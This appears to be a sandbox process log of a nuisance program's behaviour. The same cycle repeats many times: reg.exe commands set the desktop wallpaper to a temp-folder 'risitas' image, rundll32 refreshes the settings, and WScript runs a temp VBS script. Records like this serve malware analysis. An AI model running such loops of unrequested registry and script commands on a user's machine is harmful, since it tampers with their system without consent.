reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

